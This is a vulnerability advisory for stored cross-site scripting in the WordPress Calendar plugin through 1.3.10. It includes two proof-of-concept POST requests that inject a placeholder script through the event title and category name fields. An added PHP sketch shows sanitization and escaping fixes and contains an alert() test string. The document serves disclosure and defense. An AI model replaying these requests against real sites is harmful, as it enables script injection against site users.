WPVDB-ID: DB7D590A-4833-4F14-863A-EA751D43AE07
History: Oct 30, 2018 - 12:00 a.m.

Calendar <= 1.3.10 - Authenticated Stored Cross-Site Scripting (XSS)

Published: 2018-10-30 00:00:00
Author: boombyte
Source: wpscan.com
10

EPSS: 0.001 (Low)
EPSS Percentile: 24.8%

This WordPress plugin allows remote authenticated users without the unfiltered_html capability to execute JavaScript code through a stored XSS attack. By default the plugin is available to users with Contributor or higher privileges.

PoC

POC 1
# You can inject JavaScript code into the event title when creating it:

POST /wordpress/wp-admin/admin.php?page=calendar HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=calendar&action=delete&event_id=3&_wpnonce=cc7cb5ade4
Content-Type: application/x-www-form-urlencoded
Content-Length: 375
Connection: close

action=add&event_id=&_wpnonce=4c75b15fa6&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar%26action%3Ddelete%26event_id%3D3%26_wpnonce%3Dcc7cb5ade4&event_title=%[XSS]&event_desc=test&event_category=1&event_link=&event_begin=2018-10-30&event_end=2018-10-30&event_time=21%3A24&event_repeats=0&event_recur=S&save=Save+%C2%BB

POC 2
# You can inject JavaScript code into the category name when creating it:

POST /wordpress/wp-admin/admin.php?page=calendar-categories HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer:
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close

mode=add&category_id=&_wpnonce=fc2e4e9618&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar-categories&category_name=[XSS]&category_colour=&save=Save+%C2%BB
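As an added, defender-side illustration (not the Calendar plugin's own code and not part of the original advisory), the PHP sketch below contrasts the store-and-echo pattern behind this issue with input sanitization gated on the unfiltered_html capability plus output escaping. The function names are hypothetical, and plain-PHP stand-ins are used so it runs outside WordPress; the WordPress equivalents are named in the comments.

```php
<?php
// Added illustration, not the Calendar plugin's code. Shows how a stored
// event title (or category name) should be handled so that a Contributor,
// who lacks 'unfiltered_html', cannot store markup that later executes in
// wp-admin. Function names are hypothetical; comments name the WordPress
// equivalents (sanitize_text_field, wp_kses_post, esc_html).

// Vulnerable pattern: the raw POST value is stored and later echoed
// verbatim into the admin page, so any tags pass through unescaped.
function render_event_title_unsafe(string $stored_title): string {
    return '<td>' . $stored_title . '</td>';
}

// Step 1, on save: decide what markup the user may store. WordPress core
// runs wp_kses_post() on content from users without 'unfiltered_html';
// for a plain title field the stricter sanitize_text_field() (strip all
// tags) is the right choice. strip_tags() is the plain-PHP stand-in here.
function sanitize_event_title(string $raw, bool $has_unfiltered_html): string {
    $title = trim($raw);
    if (!$has_unfiltered_html) {
        $title = strip_tags($title);   // sanitize_text_field() in WordPress
    }
    return $title;
}

// Step 2, on output: escape for the HTML context regardless of what was
// stored. This alone prevents stored markup from being interpreted even
// if step 1 is missing, because '<', '>', quotes and '&' become entities.
function render_event_title_safe(string $stored_title): string {
    // esc_html() in WordPress
    $escaped = htmlspecialchars($stored_title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<td>' . $escaped . '</td>';
}

// Constructed sample input standing in for the PoC's event_title field.
$raw_title = 'Team meeting <script>alert(1)</script>';

// Contributor path: no unfiltered_html, so tags are stripped on save.
$stored = sanitize_event_title($raw_title, false);

echo render_event_title_unsafe($raw_title), "\n";  // markup reaches the browser as-is
echo render_event_title_safe($stored), "\n";       // sanitized on save, escaped on output
echo render_event_title_safe($raw_title), "\n";    // even unsanitized input is rendered inert
```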

CPE  Name      Operator  Version
     calendar  lt        1.3.11
